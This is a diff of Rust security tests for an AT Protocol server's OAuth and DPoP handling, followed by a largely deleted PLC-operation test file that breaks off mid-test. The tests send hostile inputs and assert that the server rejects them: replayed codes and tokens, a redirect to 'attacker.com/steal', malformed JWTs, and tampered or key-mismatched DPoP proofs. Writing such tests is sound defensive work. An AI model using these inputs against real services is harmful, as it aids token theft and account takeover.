assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected");
153
}
154
155
#[tokio::test]
156
+
async fn test_replay_attacks() {
157
let url = base_url().await;
158
let http_client = client();
159
let ts = Utc::now().timestamp_millis();
160
+
let handle = format!("replay-{}", ts);
161
+
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
162
+
.json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "replay-password" }))
163
+
.send().await.unwrap();
164
+
let redirect_uri = "https://example.com/replay-callback";
165
let mock_client = setup_mock_client_metadata(redirect_uri).await;
166
let client_id = mock_client.uri();
167
let (code_verifier, code_challenge) = generate_pkce();
168
+
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
169
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
170
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
171
+
.send().await.unwrap().json().await.unwrap();
172
let request_uri = par_body["request_uri"].as_str().unwrap();
173
let auth_client = no_redirect_client();
174
+
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
175
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "replay-password"), ("remember_device", "false")])
176
+
.send().await.unwrap();
177
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
178
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap().to_string();
179
+
let first = http_client.post(format!("{}/oauth/token", url))
180
+
.form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri),
181
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
182
+
.send().await.unwrap();
183
+
assert_eq!(first.status(), StatusCode::OK, "First use should succeed");
184
+
let first_body: Value = first.json().await.unwrap();
185
+
let replay = http_client.post(format!("{}/oauth/token", url))
186
+
.form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri),
187
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
188
+
.send().await.unwrap();
189
+
assert_eq!(replay.status(), StatusCode::BAD_REQUEST, "Auth code replay should fail");
190
+
let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string();
191
+
let first_refresh: Value = http_client.post(format!("{}/oauth/token", url))
192
+
.form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)])
193
+
.send().await.unwrap().json().await.unwrap();
194
+
assert!(first_refresh["access_token"].is_string(), "First refresh should succeed");
195
+
let new_rt = first_refresh["refresh_token"].as_str().unwrap();
196
+
let rt_replay = http_client.post(format!("{}/oauth/token", url))
197
+
.form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)])
198
+
.send().await.unwrap();
199
+
assert_eq!(rt_replay.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail");
200
+
let body: Value = rt_replay.json().await.unwrap();
201
+
assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("reuse"));
202
+
let family_revoked = http_client.post(format!("{}/oauth/token", url))
203
+
.form(&[("grant_type", "refresh_token"), ("refresh_token", new_rt), ("client_id", &client_id)])
204
+
.send().await.unwrap();
205
+
assert_eq!(family_revoked.status(), StatusCode::BAD_REQUEST, "Token family should be revoked");
206
}
207
208
#[tokio::test]
209
+
async fn test_oauth_security_boundaries() {
210
let url = base_url().await;
211
let http_client = client();
212
let registered_redirect = "https://legitimate-app.com/callback";
213
let mock_client = setup_mock_client_metadata(registered_redirect).await;
214
let client_id = mock_client.uri();
215
let (_, code_challenge) = generate_pkce();
216
+
let res = http_client.post(format!("{}/oauth/par", url))
217
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", "https://attacker.com/steal"),
218
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
219
+
.send().await.unwrap();
220
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
221
let ts = Utc::now().timestamp_millis();
222
+
let handle = format!("deact-{}", ts);
223
+
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
224
+
.json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "deact-password" }))
225
+
.send().await.unwrap();
226
let account: Value = create_res.json().await.unwrap();
227
+
let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
228
+
http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
229
+
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
230
+
let deact_par: Value = http_client.post(format!("{}/oauth/par", url))
231
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", registered_redirect),
232
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
233
+
.send().await.unwrap().json().await.unwrap();
234
+
let auth_res = http_client.post(format!("{}/oauth/authorize", url))
235
.header("Accept", "application/json")
236
+
.form(&[("request_uri", deact_par["request_uri"].as_str().unwrap()), ("username", &handle), ("password", "deact-password"), ("remember_device", "false")])
237
+
.send().await.unwrap();
238
+
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked");
239
+
let redirect_uri_a = "https://app-a.com/callback";
240
+
let mock_a = setup_mock_client_metadata(redirect_uri_a).await;
241
+
let client_id_a = mock_a.uri();
242
+
let mock_b = setup_mock_client_metadata("https://app-b.com/callback").await;
243
+
let client_id_b = mock_b.uri();
244
+
let ts2 = Utc::now().timestamp_millis();
245
+
let handle2 = format!("cross-{}", ts2);
246
+
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
247
+
.json(&json!({ "handle": handle2, "email": format!("{}@example.com", handle2), "password": "cross-password" }))
248
+
.send().await.unwrap();
249
+
let (code_verifier2, code_challenge2) = generate_pkce();
250
+
let par_a: Value = http_client.post(format!("{}/oauth/par", url))
251
+
.form(&[("response_type", "code"), ("client_id", &client_id_a), ("redirect_uri", redirect_uri_a),
252
+
("code_challenge", &code_challenge2), ("code_challenge_method", "S256")])
253
+
.send().await.unwrap().json().await.unwrap();
254
+
let auth_client = no_redirect_client();
255
+
let auth_a = auth_client.post(format!("{}/oauth/authorize", url))
256
+
.form(&[("request_uri", par_a["request_uri"].as_str().unwrap()), ("username", &handle2), ("password", "cross-password"), ("remember_device", "false")])
257
+
.send().await.unwrap();
258
+
let loc_a = auth_a.headers().get("location").unwrap().to_str().unwrap();
259
+
let code_a = loc_a.split("code=").nth(1).unwrap().split('&').next().unwrap();
260
+
let cross_client = http_client.post(format!("{}/oauth/token", url))
261
+
.form(&[("grant_type", "authorization_code"), ("code", code_a), ("redirect_uri", redirect_uri_a),
262
+
("code_verifier", &code_verifier2), ("client_id", &client_id_b)])
263
+
.send().await.unwrap();
264
+
assert_eq!(cross_client.status(), StatusCode::BAD_REQUEST, "Cross-client code exchange must be rejected");
265
}
266
267
#[tokio::test]
268
+
async fn test_malformed_tokens_and_headers() {
269
let url = base_url().await;
270
let http_client = client();
271
+
let malformed = vec!["", "not-a-token", "one.two", "one.two.three.four", "....", "eyJhbGciOiJIUzI1NiJ9",
272
+
"eyJhbGciOiJIUzI1NiJ9.", "eyJhbGciOiJIUzI1NiJ9..", ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid!!.eyJ9.sig"];
273
+
for token in &malformed {
274
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
275
+
.bearer_auth(token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
276
+
}
277
+
let wrong_types = vec!["JWT", "jwt", "at+JWT", ""];
278
+
for typ in wrong_types {
279
+
let header = json!({ "alg": "HS256", "typ": typ });
280
+
let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" });
281
+
let token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()),
282
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32]));
283
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
284
+
.bearer_auth(&token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "typ='{}' should be rejected", typ);
285
+
}
286
+
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
287
+
let invalid_formats = vec![format!("Basic {}", access_token), format!("Digest {}", access_token),
288
+
access_token.clone(), format!("Bearer{}", access_token)];
289
+
for auth in &invalid_formats {
290
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
291
+
.header("Authorization", auth).send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
292
+
}
293
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
294
+
.send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
295
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
296
+
.header("Authorization", "").send().await.unwrap().status(), StatusCode::UNAUTHORIZED);
297
+
let grants = vec!["client_credentials", "password", "implicit", "", "AUTHORIZATION_CODE"];
298
+
for grant in grants {
299
+
assert_eq!(http_client.post(format!("{}/oauth/token", url))
300
+
.form(&[("grant_type", grant), ("client_id", "https://example.com")])
301
+
.send().await.unwrap().status(), StatusCode::BAD_REQUEST, "Grant '{}' should be rejected", grant);
302
+
}
303
}
304
305
#[tokio::test]
306
+
async fn test_token_revocation() {
307
let url = base_url().await;
308
let http_client = client();
309
+
let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await;
310
+
assert_eq!(http_client.post(format!("{}/oauth/revoke", url))
311
+
.form(&[("token", &refresh_token)]).send().await.unwrap().status(), StatusCode::OK);
312
+
let introspect: Value = http_client.post(format!("{}/oauth/introspect", url))
313
+
.form(&[("token", &access_token)]).send().await.unwrap().json().await.unwrap();
314
+
assert_eq!(introspect["active"], false, "Revoked token should be inactive");
315
}
316
317
+
fn create_dpop_proof(method: &str, uri: &str, _nonce: Option<&str>, ath: Option<&str>, iat_offset: i64) -> String {
318
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
319
use p256::elliptic_curve::sec1::ToEncodedPoint;
320
let signing_key = SigningKey::random(&mut rand::thread_rng());
321
+
let point = signing_key.verifying_key().to_encoded_point(false);
322
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
323
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
324
+
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
325
+
let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
326
+
"htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset });
327
+
if let Some(a) = ath { payload["ath"] = json!(a); }
328
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
329
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
330
let signing_input = format!("{}.{}", header_b64, payload_b64);
331
let signature: Signature = signing_key.sign(signing_input.as_bytes());
332
+
format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()))
333
}
334
335
#[test]
336
+
fn test_dpop_nonce_security() {
337
+
let secret1 = b"test-dpop-secret-32-bytes-long!!";
338
+
let secret2 = b"different-secret-32-bytes-long!!";
339
+
let v1 = DPoPVerifier::new(secret1);
340
+
let v2 = DPoPVerifier::new(secret2);
341
+
let nonce = v1.generate_nonce();
342
+
assert!(!nonce.is_empty());
343
+
assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass");
344
+
assert!(v2.validate_nonce(&nonce).is_err(), "Nonce from different secret should fail");
345
+
let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap();
346
+
let mut tampered = nonce_bytes.clone();
347
+
if !tampered.is_empty() { tampered[0] ^= 0xFF; }
348
+
assert!(v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)).is_err(), "Tampered nonce should fail");
349
+
assert!(v1.validate_nonce("invalid").is_err());
350
+
assert!(v1.validate_nonce("").is_err());
351
+
assert!(v1.validate_nonce("!!!not-base64!!!").is_err());
352
+
}
353
+
354
+
#[test]
355
+
fn test_dpop_proof_validation() {
356
+
let secret = b"test-dpop-secret-32-bytes-long!!";
357
+
let verifier = DPoPVerifier::new(secret);
358
+
assert!(verifier.verify_proof("not.enough", "POST", "https://example.com", None).is_err());
359
+
assert!(verifier.verify_proof("invalid", "POST", "https://example.com", None).is_err());
360
+
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
361
+
assert!(verifier.verify_proof(&proof, "GET", "https://example.com/token", None).is_err(), "Method mismatch");
362
+
assert!(verifier.verify_proof(&proof, "POST", "https://other.com/token", None).is_err(), "URI mismatch");
363
+
assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None).is_ok(), "Query params should be ignored");
364
+
let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600);
365
+
assert!(verifier.verify_proof(&old_proof, "POST", "https://example.com/token", None).is_err(), "iat too old");
366
+
let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600);
367
+
assert!(verifier.verify_proof(&future_proof, "POST", "https://example.com/token", None).is_err(), "iat in future");
368
+
let ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, Some("wrong"), 0);
369
+
assert!(verifier.verify_proof(&ath_proof, "GET", "https://example.com/resource", Some("correct")).is_err(), "ath mismatch");
370
+
let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0);
371
+
assert!(verifier.verify_proof(&no_ath_proof, "GET", "https://example.com/resource", Some("expected")).is_err(), "Missing ath");
372
+
}
373
+
374
+
#[test]
375
+
fn test_dpop_proof_signature_attacks() {
376
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
377
use p256::elliptic_curve::sec1::ToEncodedPoint;
378
let secret = b"test-dpop-secret-32-bytes-long!!";
379
let verifier = DPoPVerifier::new(secret);
380
let signing_key = SigningKey::random(&mut rand::thread_rng());
381
let attacker_key = SigningKey::random(&mut rand::thread_rng());
382
+
let attacker_point = attacker_key.verifying_key().to_encoded_point(false);
383
let x = URL_SAFE_NO_PAD.encode(attacker_point.x().unwrap());
384
let y = URL_SAFE_NO_PAD.encode(attacker_point.y().unwrap());
385
+
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
386
+
let payload = json!({ "jti": format!("key-sub-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
387
+
"htm": "POST", "htu": "https://example.com/token", "iat": Utc::now().timestamp() });
388
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
389
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
390
let signing_input = format!("{}.{}", header_b64, payload_b64);
391
let signature: Signature = signing_key.sign(signing_input.as_bytes());
392
+
let mismatched = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
393
+
assert!(verifier.verify_proof(&mismatched, "POST", "https://example.com/token", None).is_err(), "Mismatched key should fail");
394
+
let point = signing_key.verifying_key().to_encoded_point(false);
395
+
let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256",
396
+
"x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } });
397
+
let good_header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&good_header).unwrap());
398
+
let good_input = format!("{}.{}", good_header_b64, payload_b64);
399
+
let good_sig: Signature = signing_key.sign(good_input.as_bytes());
400
+
let mut sig_bytes = good_sig.to_bytes().to_vec();
401
+
sig_bytes[0] ^= 0xFF;
402
+
let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes));
403
+
assert!(verifier.verify_proof(&tampered, "POST", "https://example.com/token", None).is_err(), "Tampered sig should fail");
404
}
405
406
#[test]
407
+
fn test_jwk_thumbprint() {
408
+
let jwk = DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()),
409
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
410
+
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()) };
411
+
let tp1 = compute_jwk_thumbprint(&jwk).unwrap();
412
+
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
413
+
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
414
+
assert!(!tp1.is_empty());
415
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("secp256k1".to_string()),
416
+
x: Some("x".to_string()), y: Some("y".to_string()) }).is_ok());
417
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "OKP".to_string(), crv: Some("Ed25519".to_string()),
418
+
x: Some("x".to_string()), y: None }).is_ok());
419
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: None, x: Some("x".to_string()), y: Some("y".to_string()) }).is_err());
420
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: None, y: Some("y".to_string()) }).is_err());
421
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: Some("x".to_string()), y: None }).is_err());
422
+
assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "RSA".to_string(), crv: None, x: None, y: None }).is_err());
423
}
424
425
#[test]
426
+
fn test_dpop_clock_skew() {
427
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
428
use p256::elliptic_curve::sec1::ToEncodedPoint;
429
let secret = b"test-dpop-secret-32-bytes-long!!";
430
let verifier = DPoPVerifier::new(secret);
431
+
let test_cases = vec![(-600, true), (-301, true), (-299, false), (0, false), (299, false), (301, true), (600, true)];
432
+
for (offset, should_fail) in test_cases {
433
let signing_key = SigningKey::random(&mut rand::thread_rng());
434
+
let point = signing_key.verifying_key().to_encoded_point(false);
435
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
436
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
437
+
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
438
+
let payload = json!({ "jti": format!("clock-{}-{}", offset, Utc::now().timestamp_nanos_opt().unwrap_or(0)),
439
+
"htm": "POST", "htu": "https://example.com/token", "iat": Utc::now().timestamp() + offset });
440
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
441
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
442
let signing_input = format!("{}.{}", header_b64, payload_b64);
443
let signature: Signature = signing_key.sign(signing_input.as_bytes());
444
+
let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
445
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
446
+
if should_fail { assert!(result.is_err(), "offset {} should fail", offset); }
447
+
else { assert!(result.is_ok(), "offset {} should pass", offset); }
448
}
449
}
450
451
#[test]
452
+
fn test_dpop_http_method_case() {
453
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
454
use p256::elliptic_curve::sec1::ToEncodedPoint;
455
let secret = b"test-dpop-secret-32-bytes-long!!";
456
let verifier = DPoPVerifier::new(secret);
457
let signing_key = SigningKey::random(&mut rand::thread_rng());
458
+
let point = signing_key.verifying_key().to_encoded_point(false);
459
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
460
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
461
+
let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } });
462
+
let payload = json!({ "jti": format!("case-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
463
+
"htm": "post", "htu": "https://example.com/token", "iat": Utc::now().timestamp() });
464
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
465
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
466
let signing_input = format!("{}.{}", header_b64, payload_b64);
467
let signature: Signature = signing_key.sign(signing_input.as_bytes());
468
+
let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes()));
469
+
assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token", None).is_ok(), "HTTP method should be case-insensitive");
470
}
+83
-410
tests/plc_operations.rs
+83
-410
tests/plc_operations.rs
···
5
use sqlx::PgPool;
6
7
#[tokio::test]
8
-
async fn test_request_plc_operation_signature_requires_auth() {
9
let client = client();
10
-
let res = client
11
-
.post(format!(
12
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
13
-
base_url().await
14
-
))
15
-
.send()
16
-
.await
17
-
.expect("Request failed");
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
-
}
20
-
21
-
#[tokio::test]
22
-
async fn test_request_plc_operation_signature_success() {
23
-
let client = client();
24
-
let (token, _did) = create_account_and_login(&client).await;
25
-
let res = client
26
-
.post(format!(
27
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
28
-
base_url().await
29
-
))
30
-
.bearer_auth(&token)
31
-
.send()
32
-
.await
33
-
.expect("Request failed");
34
-
assert_eq!(res.status(), StatusCode::OK);
35
-
}
36
-
37
-
#[tokio::test]
38
-
async fn test_sign_plc_operation_requires_auth() {
39
-
let client = client();
40
-
let res = client
41
-
.post(format!(
42
-
"{}/xrpc/com.atproto.identity.signPlcOperation",
43
-
base_url().await
44
-
))
45
-
.json(&json!({}))
46
-
.send()
47
-
.await
48
-
.expect("Request failed");
49
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
50
}
51
52
#[tokio::test]
53
-
async fn test_sign_plc_operation_requires_token() {
54
let client = client();
55
-
let (token, _did) = create_account_and_login(&client).await;
56
-
let res = client
57
-
.post(format!(
58
-
"{}/xrpc/com.atproto.identity.signPlcOperation",
59
-
base_url().await
60
-
))
61
-
.bearer_auth(&token)
62
-
.json(&json!({}))
63
-
.send()
64
-
.await
65
-
.expect("Request failed");
66
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
67
let body: serde_json::Value = res.json().await.unwrap();
68
assert_eq!(body["error"], "InvalidRequest");
69
-
}
70
-
71
-
#[tokio::test]
72
-
async fn test_sign_plc_operation_invalid_token() {
73
-
let client = client();
74
-
let (token, _did) = create_account_and_login(&client).await;
75
-
let res = client
76
-
.post(format!(
77
-
"{}/xrpc/com.atproto.identity.signPlcOperation",
78
-
base_url().await
79
-
))
80
-
.bearer_auth(&token)
81
-
.json(&json!({
82
-
"token": "invalid-token-12345"
83
-
}))
84
-
.send()
85
-
.await
86
-
.expect("Request failed");
87
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
88
let body: serde_json::Value = res.json().await.unwrap();
89
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
90
}
91
92
#[tokio::test]
93
-
async fn test_submit_plc_operation_requires_auth() {
94
-
let client = client();
95
-
let res = client
96
-
.post(format!(
97
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
98
-
base_url().await
99
-
))
100
-
.json(&json!({
101
-
"operation": {}
102
-
}))
103
-
.send()
104
-
.await
105
-
.expect("Request failed");
106
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
107
-
}
108
-
109
-
#[tokio::test]
110
-
async fn test_submit_plc_operation_invalid_operation() {
111
let client = client();
112
-
let (token, _did) = create_account_and_login(&client).await;
113
-
let res = client
114
-
.post(format!(
115
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
116
-
base_url().await
117
-
))
118
-
.bearer_auth(&token)
119
-
.json(&json!({
120
-
"operation": {
121
-
"type": "invalid_type"
122
-
}
123
-
}))
124
-
.send()
125
-
.await
126
-
.expect("Request failed");
127
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
128
let body: serde_json::Value = res.json().await.unwrap();
129
assert_eq!(body["error"], "InvalidRequest");
130
-
}
131
-
132
-
#[tokio::test]
133
-
async fn test_submit_plc_operation_missing_sig() {
134
-
let client = client();
135
-
let (token, _did) = create_account_and_login(&client).await;
136
-
let res = client
137
-
.post(format!(
138
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
139
-
base_url().await
140
-
))
141
-
.bearer_auth(&token)
142
-
.json(&json!({
143
-
"operation": {
144
-
"type": "plc_operation",
145
-
"rotationKeys": [],
146
-
"verificationMethods": {},
147
-
"alsoKnownAs": [],
148
-
"services": {},
149
-
"prev": null
150
-
}
151
-
}))
152
-
.send()
153
-
.await
154
-
.expect("Request failed");
155
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
156
let body: serde_json::Value = res.json().await.unwrap();
157
assert_eq!(body["error"], "InvalidRequest");
158
-
}
159
-
160
-
#[tokio::test]
161
-
async fn test_submit_plc_operation_wrong_service_endpoint() {
162
-
let client = client();
163
-
let (token, _did) = create_account_and_login(&client).await;
164
-
let res = client
165
-
.post(format!(
166
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
167
-
base_url().await
168
-
))
169
-
.bearer_auth(&token)
170
-
.json(&json!({
171
-
"operation": {
172
-
"type": "plc_operation",
173
-
"rotationKeys": ["did:key:z123"],
174
-
"verificationMethods": {"atproto": "did:key:z456"},
175
-
"alsoKnownAs": ["at://wrong.handle"],
176
-
"services": {
177
-
"atproto_pds": {
178
-
"type": "AtprotoPersonalDataServer",
179
-
"endpoint": "https://wrong.example.com"
180
-
}
181
-
},
182
-
"prev": null,
183
-
"sig": "fake_signature"
184
-
}
185
-
}))
186
-
.send()
187
-
.await
188
-
.expect("Request failed");
189
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
190
}
191
192
#[tokio::test]
193
-
async fn test_request_plc_operation_creates_token_in_db() {
194
let client = client();
195
let (token, did) = create_account_and_login(&client).await;
196
-
let res = client
197
-
.post(format!(
198
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
199
-
base_url().await
200
-
))
201
-
.bearer_auth(&token)
202
-
.send()
203
-
.await
204
-
.expect("Request failed");
205
assert_eq!(res.status(), StatusCode::OK);
206
let db_url = get_db_connection_string().await;
207
-
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
208
let row = sqlx::query!(
209
-
r#"
210
-
SELECT t.token, t.expires_at
211
-
FROM plc_operation_tokens t
212
-
JOIN users u ON t.user_id = u.id
213
-
WHERE u.did = $1
214
-
"#,
215
did
216
-
)
217
-
.fetch_optional(&pool)
218
-
.await
219
-
.expect("Query failed");
220
assert!(row.is_some(), "PLC token should be created in database");
221
let row = row.unwrap();
222
-
assert!(
223
-
row.token.len() == 11,
224
-
"Token should be in format xxxxx-xxxxx"
225
-
);
226
assert!(row.token.contains('-'), "Token should contain hyphen");
227
-
assert!(
228
-
row.expires_at > chrono::Utc::now(),
229
-
"Token should not be expired"
230
-
);
231
-
}
232
-
233
-
#[tokio::test]
234
-
async fn test_request_plc_operation_replaces_existing_token() {
235
-
let client = client();
236
-
let (token, did) = create_account_and_login(&client).await;
237
-
let res1 = client
238
-
.post(format!(
239
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
240
-
base_url().await
241
-
))
242
-
.bearer_auth(&token)
243
-
.send()
244
-
.await
245
-
.expect("Request 1 failed");
246
-
assert_eq!(res1.status(), StatusCode::OK);
247
-
let db_url = get_db_connection_string().await;
248
-
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
249
-
let token1 = sqlx::query_scalar!(
250
-
r#"
251
-
SELECT t.token
252
-
FROM plc_operation_tokens t
253
-
JOIN users u ON t.user_id = u.id
254
-
WHERE u.did = $1
255
-
"#,
256
-
did
257
-
)
258
-
.fetch_one(&pool)
259
-
.await
260
-
.expect("Query failed");
261
-
let res2 = client
262
-
.post(format!(
263
-
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
264
-
base_url().await
265
-
))
266
-
.bearer_auth(&token)
267
-
.send()
268
-
.await
269
-
.expect("Request 2 failed");
270
-
assert_eq!(res2.status(), StatusCode::OK);
271
let token2 = sqlx::query_scalar!(
272
-
r#"
273
-
SELECT t.token
274
-
FROM plc_operation_tokens t
275
-
JOIN users u ON t.user_id = u.id
276
-
WHERE u.did = $1
277
-
"#,
278
-
did
279
-
)
280
-
.fetch_one(&pool)
281
-
.await
282
-
.expect("Query failed");
283
assert_ne!(token1, token2, "Second request should generate a new token");
284
let count: i64 = sqlx::query_scalar!(
285
-
r#"
286
-
SELECT COUNT(*) as "count!"
287
-
FROM plc_operation_tokens t
288
-
JOIN users u ON t.user_id = u.id
289
-
WHERE u.did = $1
290
-
"#,
291
-
did
292
-
)
293
-
.fetch_one(&pool)
294
-
.await
295
-
.expect("Count query failed");
296
assert_eq!(count, 1, "Should only have one token per user");
297
}
298
-
299
-
#[tokio::test]
300
-
async fn test_submit_plc_operation_wrong_verification_method() {
301
-
let client = client();
302
-
let (token, did) = create_account_and_login(&client).await;
303
-
let hostname =
304
-
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
305
-
let handle = did.split(':').last().unwrap_or("user");
306
-
let res = client
307
-
.post(format!(
308
-
"{}/xrpc/com.atproto.identity.submitPlcOperation",
309
-
base_url().await
310
-
))
311
-
.bearer_auth(&token)
312
-
.json(&json!({
313
-
"operation": {
314
-
"type": "plc_operation",
315
-
"rotationKeys": ["did:key:zWrongRotationKey123"],
316
-
"verificationMethods": {"atproto": "did:key:zWrongVerificationKey456"},
317
-
"alsoKnownAs": [format!("at://{}", handle)],
318
-
